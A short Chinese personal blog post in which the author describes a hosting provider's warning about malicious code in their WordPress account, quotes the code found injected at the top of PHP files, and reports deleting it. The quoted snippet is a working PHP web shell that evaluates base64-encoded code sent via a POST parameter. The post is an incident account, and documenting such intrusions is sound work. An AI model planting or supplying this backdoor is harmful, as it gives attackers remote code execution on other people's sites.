Notice: Undefined index: HTTP_USER_AGENT in /var/www/html/cuijunwei/wp-content/plugins/crayon-syntax-highlighter/util/crayon_util.class.php on line 793
Notice: Undefined index: HTTP_USER_AGENT in /var/www/html/cuijunwei/wp-content/plugins/crayon-syntax-highlighter/util/crayon_util.class.php on line 793
早上起来收到bluehost的邮件,称我的帐户里面有恶意代码,都是针对wordpress,并且列举如下:
1 |
<?php if ($_POST["php"]){eval ( base64_decode($_POST["php"]));exit;} ?> |
1 2 3 |
eval ( base64_decode($_POST["php"])); <?php eval ( base64_decode("balabala……balabala")); //这段之所以有简略和增加空格是因为怕被防火墙ban掉 |
查看了一下文件,发现是在有些php文件的头部分加入了这个东西,这个东西之前并没有看到,删掉之后也没有什么影响。
一直没有很重视安全这一块,如今终于被黑,算是寡人踏入本领域的一个标志性事件吧。